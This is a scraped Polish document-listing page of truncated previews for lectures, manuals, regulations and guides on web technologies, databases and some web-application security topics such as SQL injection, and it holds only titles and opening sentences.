Protokół HTTP 1. Protokół HTTP, usługi www, model request-response (żądanie-odpowiedź), przekazywanie argumentów, AJAX. 1 Usługi WWW WWW (World Wide Web) jest najpopularniejszym sposobem udostępniania
Bardziej szczegółowoTIN Techniki Internetowe zima 2015-2016
TIN Techniki Internetowe zima 2015-2016 Grzegorz Blinowski Instytut Informatyki Politechniki Warszawskiej Plan wykładów 2 Intersieć, ISO/OSI, protokoły sieciowe, IP 3 Protokoły transportowe: UDP, TCP 4
Bardziej szczegółowoFormularz rzeczowo-cenowy PAKIET 2
Formularz rzeczowo-cenowy PAKIET 2 Lp. Nazwa systemu Opis zadania do wykonania Cena netto 1. Extranet 1. Zapisywanie do bazy nowo dodanych przez redaktorów slajdów w oryginalnym rozmiarze oraz następnie
Bardziej szczegółowoGEO-SYSTEM Sp. z o.o. GEO-RCiWN Rejestr Cen i Wartości Nieruchomości Podręcznik dla uŝytkowników modułu wyszukiwania danych Warszawa 2007
GEO-SYSTEM Sp. z o.o. 02-732 Warszawa, ul. Podbipięty 34 m. 7, tel./fax 847-35-80, 853-31-15 http:\\www.geo-system.com.pl e-mail:geo-system@geo-system.com.pl GEO-RCiWN Rejestr Cen i Wartości Nieruchomości
Bardziej szczegółowoBezpieczeństwo systemów komputerowych
Bezpieczeństwo systemów komputerowych Zagrożenia dla aplikacji internetowych Aleksy Schubert (Marcin Peczarski) Instytut Informatyki Uniwersytetu Warszawskiego 15 grudnia 2015 Lista zagadnień Wstrzykiwanie
Bardziej szczegółowoInstrukcja obsługi platformy zakupowej e-osaa (klient podstawowy)
Instrukcja obsługi platformy zakupowej e-osaa (klient podstawowy) 1. Wejście na stronę http://www.officemedia.com.pl strona główną Office Media 2. Logowanie do zakupowej części serwisu. Login i hasło należy
Bardziej szczegółowoPierwsze kroki. Krok 1. Uzupełnienie danych własnej firmy
Pierwsze kroki Krok 1. Uzupełnienie danych własnej firmy Przed rozpoczęciem pracy z programem, należy uzupełnić informacje o własnej firmie. Odbywa się to dokładnie tak samo, jak uzupełnianie informacji
Bardziej szczegółowoJęzyki programowania wysokiego poziomu. PHP cz.3. Formularze
Języki programowania wysokiego poziomu PHP cz.3. Formularze Formularze Sposób przesyłania danych formularza do serwera zależy od wybranej metody HTTP: Metoda GET
Bardziej szczegółowoProgramowanie w internecie nazwa przedmiotu SYLABUS A. Informacje ogólne
Programowanie w internecie nazwa SYLABUS A. Informacje ogólne Elementy składowe sylabusu Nazwa jednostki prowadzącej studiów Poziom kształcenia Profil studiów Forma studiów Rodzaj Rok studiów /semestr
Bardziej szczegółowoVLAN Ethernet. być konfigurowane w dowolnym systemie operacyjnym do ćwiczenia nr 6. Od ćwiczenia 7 należy pracować ć w systemie Linux.
VLAN Ethernet Wstęp Ćwiczenie ilustruje w kolejnych krokach coraz bardziej złożone one struktury realizowane z użyciem wirtualnych sieci lokalnych. Urządzeniami, które będą realizowały wirtualne sieci
Bardziej szczegółowoenova Workflow Obieg faktury kosztowej
enova Workflow Obieg faktury kosztowej Spis treści 1. Wykorzystanie procesu... 3 1.1 Wprowadzenie dokumentu... 3 1.2 Weryfikacja merytoryczna dokumentu... 5 1.3 Przydzielenie zadań wybranym operatorom...
Bardziej szczegółowoSpis treści. Rozdział 1 ewyniki. mmedica - INSTR UKC JA UŻYTKO W NIKA
Wersja 5.1.9 Spis treści Rozdział 1 1.1 1.1.1 1.1.2 1.2 1.3 1.4 1.5 I Konfiguracja... 1-1 OID świadczeniodawcy... 1-2 Dodanie... instytucji zewnętrznej 1-4 Dodanie... zlecenia 1-11 Pobranie... materiału
Bardziej szczegółowoWspółczesne serwisy internetowe. Wykład 1 Dr Krzysztof Podlaski
Współczesne serwisy internetowe Wykład 1 Dr Krzysztof Podlaski Dane Kontaktowe Podlaski Krzysztof E-mail podlaski@uni.lodz.pl www: http://merlin.phys.uni.lodz.pl/kpodlaski Tutaj będą slajdy z wykładów
Bardziej szczegółowoSpis treści INTERFEJS (WEBSERVICES) - DOKUMENTACJA TECHICZNA 1
I N T E R F E J S W E BSERVICES NADAWANIE PAKIETÓW DO S YSTEMU MKP P RZEZ INTERNET D O K U M E N T A C J A T E C H N I C Z N A S T Y C Z E Ń 2 0 1 2 Spis treści 1. Wstęp... 2 2. Informacje ogólne... 2
Bardziej szczegółowoAplikacje internetowe Przegl¹d zagro eñ
VIII Seminarium PLOUG Warszawa Kwiecieñ 2003 Aplikacje internetowe Przegl¹d zagro eñ Wojciech Dworakowski (wojciech.dworakowski@securing.pl) SecuRing Aplikacje internetowe Przegląd zagrożeń 7 Integracja
Bardziej szczegółowoTomasz Greszata - Koszalin 2012 - http://greszata.pl
T: Uprawnienia do udostępnionych folderów. W systemie Windows XP folder udostępniać mogą tylko członkowie grup Administratorzy i Użytkownicy Zaawansowani. Podczas udostępniania określamy nazwę zasobu,
Bardziej szczegółowoemszmal 3: Automatyczne księgowanie przelewów w menedżerze sprzedaży BaseLinker (plugin dostępny w wersji ecommerce)
emszmal 3: Automatyczne księgowanie przelewów w menedżerze sprzedaży BaseLinker (plugin dostępny w wersji ecommerce) Zastosowanie Rozszerzenie to dedykowane jest internetowemu menedżerowi sprzedaży BaseLinker.
Bardziej szczegółowoInstalacja. Zawartość. Wyszukiwarka. Instalacja... 1. Konfiguracja... 2. Uruchomienie i praca z raportem... 4. Metody wyszukiwania...
Zawartość Instalacja... 1 Konfiguracja... 2 Uruchomienie i praca z raportem... 4 Metody wyszukiwania... 6 Prezentacja wyników... 7 Wycenianie... 9 Wstęp Narzędzie ściśle współpracujące z raportem: Moduł
Bardziej szczegółowoAplikacje internetowe oparte na kluczowych technologiach Java Enterprise(Servlet,JSP,JDBC, )
Kod szkolenia: Tytuł szkolenia: JEE/JSP Aplikacje internetowe oparte na kluczowych technologiach Java Enterprise(Servlet,JSP,JDBC, ) Dni: 5 Opis: Adresaci szkolenia: Szkolenie adresowane jest do programistów
Bardziej szczegółowoREGULAMIN INTERNETOWEJ OBSŁUGI KLIENTA
REGULAMIN INTERNETOWEJ OBSŁUGI KLIENTA Niniejszy Regulamin określa zasady korzystania z usługi Internetowej Obsługi Klienta (ebok). Rejestrując się, Klient potwierdza, że zapoznał się z treścią regulaminu
Bardziej szczegółowo6. Bezpieczeństwo przy współpracy z bazami danych
6. Bezpieczeństwo przy współpracy z bazami danych 6.1. Idea ataku SQL injection Atak znany jako SQL injection jest możliwy wtedy, gdy użytkownik ma bezpośredni wpływ na postać zapytania wysyłanego do bazy
Bardziej szczegółowoINFORMATOR TECHNICZNY WONDERWARE
Informator techniczny nr 95 04-06-2007 INFORMATOR TECHNICZNY WONDERWARE Synchronizacja czasu systemowego na zdalnych komputerach względem czasu systemowego na komputerze z serwerem Wonderware Historian
Bardziej szczegółowoPrzekształcenie danych przestrzennych w interaktywne mapy dostępne na stronach www (WARSZTATY, poziom podstawowy)
Wrocławski Instytut Zastosowań Informacji Przestrzennej i Sztucznej Inteligencji Przekształcenie danych przestrzennych w interaktywne mapy dostępne na stronach www (WARSZTATY, poziom podstawowy) Szkolenia
Bardziej szczegółowoLogowanie do systemu Faktura elektroniczna
Logowanie do systemu Faktura elektroniczna Dostęp do Systemu Faktury Elektronicznej możliwy jest poprzez kliknięcie odnośnika Moja faktura w prawym górnym rogu strony www.wist.com.pl, a następnie przycisku
Bardziej szczegółowoRegulamin serwisu internetowego ramowka.fm
Regulamin serwisu internetowego ramowka.fm Art. 1 DEFINICJE 1. Serwis internetowy serwis informacyjny, będący zbiorem treści o charakterze informacyjnym, funkcjonujący pod adresem: www.ramowka.fm. 2. Administrator
Bardziej szczegółowoREGULAMIN PRZESYŁANIA I UDOSTĘPNIANIA FAKTUR W FORMIE ELEKTRONICZNEJ E-FAKTURA ROZDZIAŁ 1. I. Postanowienia ogólne
Katowickie Wodociągi Spółka Akcyjna ul. Obr.Westerplatte 89 40-335 Katowice Sekretariat: 32 25 54 810 Fax: 32 78 82 503 kancelaria@wodociagi.katowice.pl http://www.wodociagi.katowice.pl/oradnik/efaktura-regulamin.html
Bardziej szczegółowoInstrukcja Obsługi STRONA PODMIOTOWA BIP
Instrukcja Obsługi STRONA PODMIOTOWA BIP Elementy strony podmiotowej BIP: Strona podmiotowa Biuletynu Informacji Publicznej podzielona jest na trzy części: Nagłówek strony głównej Stopka strony podmiotowej
Bardziej szczegółowoBazy danych i strony WWW
Bazy danych i strony WWW Obsługa baz danych poprzez strony WWW Niezbędne narzędzia: serwer baz danych np. MySQL serwer stron WWW np. Apache przeglądarka stron WWW interpretująca język HTML język skryptowy
Bardziej szczegółowodbsamples.udl lub przygotowany wcześniej plik dla Excela) i OK,
PRACA Z BAZAMI DANYCH w AutoCAD-zie AutoCAD umożliwia dostęp do zewnętrznych baz danych, utworzonych zarówno w MS ACCESS czy w MS EXCEL, jak i w dbase czy SQL Server. Połączenie następuje poprzez odwołanie
Bardziej szczegółowoAby ułatwić współdzielenie oferty noclegowej w różnych obiektach oraz agregatorach ofert i zestandaryzować ten proces
Specyfikacja formatu IOF dla Bookingu Cel: Aby ułatwić współdzielenie oferty noclegowej w różnych obiektach oraz agregatorach ofert i zestandaryzować ten proces Uwagi: IOF dla Bookingu składa się z części
Bardziej szczegółowoZarządzanie Zasobami by CTI. Instrukcja
Zarządzanie Zasobami by CTI Instrukcja Spis treści 1. Opis programu... 3 2. Konfiguracja... 4 3. Okno główne programu... 5 3.1. Narzędzia do zarządzania zasobami... 5 3.2. Oś czasu... 7 3.3. Wykres Gantta...
Bardziej szczegółowoInstrukcja zarządzania systemem informatycznym służącym do przetwarzania danych osobowych
Załącznik nr 1 do Zarządzenia Nr 1/2013 Dyrektora Zespołu Obsługi Szkół i Przedszkoli w Muszynie z dnia 30 grudnia 2013 r. Instrukcja zarządzania systemem informatycznym służącym do przetwarzania danych
Bardziej szczegółowoI. INSTALACJA BAZY DANYCH ORACLE10g EXPRESS EDITION
I. INSTALACJA BAZY DANYCH ORACLE10g EXPRESS EDITION Plik instalacyjny mo na uzyska ze stron firmy Oracle http://otn.oracle.com, wybieraj c w rozwijanym menu DOWNLOADS Database. Aby pobra interesuj c nas
Bardziej szczegółowoPracownia internetowa w ka dej szkole (edycja 2004)
Instrukcja numer SPD1/04_02/Z Pracownia internetowa w ka dej szkole (edycja 2004) Opiekun pracowni internetowej cz. 1 (PD1) Ustawianie praw dost pu do zasobów zgodnie ze specyfikacj MENiS 2004 Zadanie
Bardziej szczegółowoMarcin Werla mwerla@man.poznan.pl
Dobre praktyki udostępniania on-line baz bibliograficznych i pełnotekstowych Marcin Werla mwerla@man.poznan.pl Udostępnianie on-line baz bibliograficznych i pełnotekstowych Budując i udostępniając bazę
Bardziej szczegółowoKONFIGURACJA PRZEGLĄDAREK
KONFIGURACJA PRZEGLĄDAREK Konfiguracja przeglądarki Internet Explorer 8.0... 2 Konfiguracja przeglądarki Internet Explorer 9.0... 7 Konfiguracja przeglądarki Internet Explorer 10.0... 13 Konfiguracja przeglądarki
Bardziej szczegółowoKontrola sesji w PHP HTTP jest protokołem bezstanowym (ang. stateless) nie utrzymuje stanu między dwoma transakcjami. Kontrola sesji służy do
Sesje i ciasteczka Kontrola sesji w PHP HTTP jest protokołem bezstanowym (ang. stateless) nie utrzymuje stanu między dwoma transakcjami. Kontrola sesji służy do śledzenia użytkownika podczas jednej sesji
Bardziej szczegółowoWYKŁAD 1 SYSTEMY CMS CZĘŚĆ 1
WYKŁAD 1 SYSTEMY CMS CZĘŚĆ 1 SYSTEM ZARZĄDZANIA TREŚCIĄ (Content Management System, CMS) System używany do zarządzania treścią strony internetowej. Z reguły składa się z dwóch elementów: aplikacji do zarządzania
Bardziej szczegółowoInternetowe bazy danych
Wyższa Szkoła Technologii Teleinformatycznych w Świdnicy Internetowe bazy danych wykład 6 dr inż. Jacek Mazurkiewicz e-mail: Jacek.Mazurkiewicz@pwr.wroc.pl Kontrola dostępu
Bardziej szczegółowoIntegracja systemów, integracja procesów
Nowe rozwiązania informatyczne w zmieniającej się rzeczywistości akademickiej Integracja systemów, integracja procesów... Janina Mincer-Daszkiewicz Uniwersytet Warszawski, MUCI jmd@mimuw.edu.pl Warszawa,
Bardziej szczegółowoŚrubka zamykająca Uchwyt ścienny Przycisk kontrolny Lampka kontrolna
Modem GSM do sterowania ogrzewaniem 1 Przegląd W połączeniu z radiowym regulatorem temperatury pokojowej X2D modem ten umożliwia zdalne sterowanie ogrzewaniem. Zdalne sterowanie odbywa się za pomocą komunikatów
Bardziej szczegółowoMUltimedia internet Instrukcja Instalacji
MUltimedia internet Instrukcja Instalacji MUltimedia internet Instrukcja Instalacji 1 2 MULTIMEDIA Internet 1. Zestaw instalacyjny 4 2. Budowa modemu ADSL 5 3. Podłączenie modemu ADSL 7 4. Konfiguracja
Bardziej szczegółowoSpis treści 1. Wstęp 2. Projektowanie systemów informatycznych
Spis treści 1. Wstęp... 9 1.1. Inżynieria oprogramowania jako proces... 10 1.1.1. Algorytm... 11 1.2. Programowanie w językach wysokiego poziomu... 11 1.3. Obiektowe podejście do programowania... 12 1.3.1.
Bardziej szczegółowoBazy danych II. Andrzej Grzybowski. Instytut Fizyki, Uniwersytet Śląski
Bazy danych II Andrzej Grzybowski Instytut Fizyki, Uniwersytet Śląski Wykład 11 Zastosowanie PHP do programowania aplikacji baz danych Oracle Wsparcie programowania w PHP baz danych Oracle Oprócz możliwego
Bardziej szczegółowoOpis obsługi systemu Ognivo2 w aplikacji Komornik SQL-VAT
Opis obsługi systemu Ognivo2 w aplikacji Komornik SQL-VAT Spis treści Instrukcja użytkownika systemu Ognivo2... 3 Opis... 3 Konfiguracja programu... 4 Rejestracja bibliotek narzędziowych... 4 Konfiguracja
Bardziej szczegółowoWdrożenie modułu płatności eservice dla systemu Virtuemart 2.0.x
Wdrożenie modułu płatności eservice dla systemu Virtuemart 2.0.x Wersja 02 Styczeń 2016 Centrum Elektronicznych Usług Płatniczych eservice Sp. z o.o. Spis treści 1. Wstęp... 3 1.1. Przeznaczenie dokumentu...
Bardziej szczegółowos FAQ: 13/PL Data: 29/01/2012
Implementacja apletów Java do procesora komunikacyjnego CP-343-1 Advanced. 1 I. Wymagania sprz towe i oprogramowania: 1. Komputer klasy PC z systemem operacyjnym Windows 2000 Professional z SP 4/XP Professional
Bardziej szczegółowoKonfiguracja współpracy urządzeń mobilnych (bonowników).
Konfiguracja współpracy urządzeń mobilnych (bonowników). Konfiguracja dzieli się na 3 kroki. 1. Konfiguracja i uruchomienie serwera ftp. 2. Konfiguracja Bistro. 3. Konfiguracja aplikacji mobilnej BistroMo.
Bardziej szczegółowoPS IMAGO 3.0 /// instrukcja instalacji
PS IMAGO 3.0 /// instrukcja instalacji Instalacja PS IMAGO PS IMAGO jest rozwiązaniem zawierającym rozszerzenie funkcjonalności systemu IBM SPSS Statistics i nie działa jako produkt niezależny. Produkt
Bardziej szczegółowo